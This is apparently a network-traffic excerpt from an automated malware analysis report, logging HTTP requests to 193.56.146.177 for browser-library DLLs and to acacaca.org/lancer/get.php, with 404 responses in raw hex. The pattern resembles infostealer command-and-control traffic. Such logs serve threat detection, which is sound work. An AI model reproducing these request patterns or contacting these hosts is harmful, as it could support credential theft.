                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 19 00 00 00 1d 3d 5a e0 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 81 a1 55 00 37 ca 03 00 34 6f 8a 38 01 00 00 00 02 00 9c 03 00 00 0b c7 2c d9 be ef eb d2 bd 2e c3 67 08 06 02 00 40 eb c6 2e f0 6e ee d7 e9 bd f9 83 e3 fa 59 39 e6 76 88 b3 a1 01 bf 7d 48 17 e1 72 38 42 66 6e fd db 9f 15 05 ab 70 0b d5 82 12 70 ec e7 c1 ff 16 2a 96 7d 51 48 1f fa dc 42 85 ec 43 68 33 db 77 1e 9a 81 29 70 b3 46 06 9e d1 12 e5 06 3e 74 24 f7 32 37 ee ba 23 ee f5 6b fa 15 25 df 9d 08 31 c3 f6 6e 7e f5 e8 b0 59 f7 78 c7 30 68 85 3b 23 5d 01 09 b8 6e c2 17 d7 33 60 0a 44 17 75 7e 1d 99 98 81 c4 1d 96 cd ff 9e f8 ea 68 1f 79 de e5 d7 07 69 9e cc 31 79 ad 23 2e ad be cb 30 ab 72 a9 fd bb d6 02 59 9c 8d 4d eb 6b 0e cf fe 5e 64 99 f6 34 66 48 3d f7 db ec ea 8a c8 ff 70 a6 cb d4 20 6e 0c 06 d6 a0 00 66 2f c9 4a 1c 54 f7 d9 91 47 37 d3 64 d7 c1 c0 72 f1 05 fd b0 80 3d 13 24 a6 91 f2 1a 01 ce 40 9f ff 96 7f 28 5f fa 98 f2 5b e9 1e c2 1a 23 de bb 50 bc 7c 3d 59 f4 87 43 79 1d 39 c9 7a 61 c9 02 34 15 01 74 7d a9 05 84 bb 61 ce 24 5a ba ec 10 aa 1b d2 c0 09 15 16 f9 9f 57 cc 0e 41 fd a7 12 6b a3 c0 1c 33 ba 1a 5d 3f ac 4d 0a 15 b0 68 2b a1 af c5 fd 75 58 fb 96 a7 88 32 2e fa c8 53 43 96 d9 1c 94 e7 e7 89 44 aa bb 53 50 cb a4 b7 49 c6 9f a4 1f d4 da b3 cb ac 66 84 6f 45 b0 71 fa 9c 7b 5d 83 cb ad 6b 12 db 6e 53 62 1c 71 69 87 b6 43 b4 c9 eb c1 30 85 5b d6 06 3f bf 50 a3 4d eb 4b 22 f7 6a 71 15 37 47 4c ff 29 7f 81 ec d0 04 92 bb fd 3d f7 d9 5c b2 13 60 c7 b2 d4 db e1 60 43 83 27 90 b4 9a 69 ec d8 fd fe 0f 77 ac 28 6b dc 47 8b a5 0f c9 f6 de 42 74 d4 ce 4f 65 3f 31 fe 7e a7 db 55 a4 8f c1 bd 29 5a e3 96 99 24 71 dd 67 7f cf 4e 85 88 08 b0 7d a3 11 c5 33 58 68 96 3a c4 ae 68 f7 db f3 e0 98 ac 93 f8 17 55 8c d0 cd 54 3f 64 70 5c 23 ae b5 39 8f f2 13 23 0b a1 50 b9 8a 34 e5 4a 2e da 9e 1c b4 62 fc 53 d7 03 98 df ef d9 93 f4 26 07 44 37 ad 17 4e 47 5a ec 23 37 56 34 9b 05 0a 67 9a b5 fe 79 c4 ec 97 d1 f8 7e 96 1f c8 a9 f8 3c 17 66 84 2a fc c6 57 50 82 d5 e8 a1 74 bf 71 bf 36 54 94 86 a9 62 40 1d b8 f1 f1 77 aa 36 4b 89 de b7 01 a1 0b d8 7f cd 37 49 8b b1 11 44 0d b6 70 7d dc 33 66 8c ac d5 87 27 bd e6 d8 d2 26 60 17 47 58 3f bc 42 bb 56 3c f9 ce 8b 2a eb 95 78 bd ae db 35 ac 35 d4 bc 24 3a 8a 21 95 db 9e 9a 2d 00 53 6b 8c c5 e4 10 ae 5e f2 06 40 6e 5c 72 aa 78 ea 25 ed 76 40 15 bb 8e 0e 97 6d 57 87 ae f9 32 7f f6 f8 f5 d2 ea 62 b0 bf 0d a0 93 5e a1 e5 c6 61 dd 49 29 77 d2 dd e1 24 96 1d c0 31 b3 99 25 9a 65 af 6f 6b ad 68 ec 4c 33 30 f8 e5 c5 76 45 98 2f a2 ae ab 3d 11 59 6c 44 8d b2 7b f4 67 b9 9b 37 da 06 41 48 04 b0 22 6f 4c 8e 73 38 51 b0 be 92 30 ff a0 26 51 6b 9d d0 df 69 97 46 7d a5 2e 81 e7 61 fa 7c 75 a1 71 3f 7a f0 cb ab ff 70 ad c3 2a 29 db 6f 97 d0 d4 90 61 97 13 f0 7f 9c 83 c7 48 1e ef 26 f1 d4 14 3f 17 26 da f9 60 de ac 18 d5 20 aa 5b 54 47 8f 5f f9 bd 6d cd 7c 9d d3 78 7f 38 6e da ed 6d 1f 99 0f e0 2
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 cf d7 62 3e d6 48 74 57 7a 18 8f 9b a6 8b 53 58 3d 19 f0 79 52 b5 be 51 ae ad 6c da 16 7b 55 98 a6 e2 6e ee 2b 53 31 ef dd a4 d9 97 b4 79 37 55 46 3c 5b d4 0c 2a 5b 83 64 99 98 76 87 f2 bd e8 5f 42 a4 0d 9c ba 2b fe 36 f8 37 33 ad 19 7f 7b ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 2a ba b3 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 9f f4 ff 78 91 56 db c4 0d 13 13 5f 44 e0 92 24 18 4f c5 03 51 c8 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca f3 96 be 21 51 61 e9 fb 38 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d c3 27 e7 0e f4 eb 7e 71 eb f0 f3 1a 68 c6 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 92 66 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f e3 05 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d d7 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 77 b2 dc 8e 82 11 e8 e4 1f 84 a2 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 24 65 87 1f d4 ac 6b 91 9c 3d 07 f1 2c 80 ad 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 cc e4 8b 8b e1 12 7c d7 9c d6 c3 e0 2b 5b b0 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 20 d3 b9 e9 39 4c af 80 95 1c 54 4c 49 8f 88 8f 71 00 28 ae a1 b1 65 86 41 a9 a1 0d 61 7f 8e 4f 70 72 4d 39 bb 57 ea 38 15 66 78 40 e8 7d ec 82 b7 6a 05 03 11 2e 80 54 8b 9d 53 a1 2a f6 66 3f b0 46 7a da 73 be f0 29 c5 8b 78 27 43 1d a4 ac bf 6c 13 d9 a8 6a e5 36 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 50 53 a4 4c 5f ff 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 7f 10 13 bf 84 ea 92 24 08 4f c5 13 95 ca a1 61 6e de f5 69 29 1a 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 24 30 7c 88 2c c8 48 63 52 cd 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 8f f1 f6 1a 38 9b 4a d8 19 8e c2 4f 2b bb 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 ff e6 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac cf 41 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 d6 e5 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 67 2f a2 90 4e b1 54 55 a5 fc b4 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 94 a4 0c f1 2c ce ad 03 5b cf 16 e4 a6 0b 13 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cb f8 f9 82 62 7a d7 8c 4a c3 e0 2b 89 ba bb 01 be 17 28 d2 0e 4a 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 02 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 2a 82 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e cb aa 9a a5 92 db a0 c1 b9 dd 7a d5 31 4b 19 e0 3c 95 a9 18 aa f0 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 10 45 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2c b9 9e f1 cc 23 b2 d5 08 31 79 b0 82 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 11 3a 27 34 19 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 3a ef 14 ee c3 de 57 a3 4c 89 80 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 29 c5 7f 74 79 e0 68 43 cc 9b 8b 8b e1 fa 7f d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 0c c0 d9 37 00 60 e6 1c c9 20 f5 52 48 7e 3f 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 73 89 ce ec 35 98 c5 a7 0d 88 ca d4 5f 93 46 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f bf c5 ac 8b c8 2f 2b 92 09 e8 8b 03 18 ac 18 ca 77 b3 0e 49 84 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 1c 6b 93 83 01 ee 43 d9 ed 07 90 40 dc 1a 3e 8d 18 57 03 13 7d 42 4f 87 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
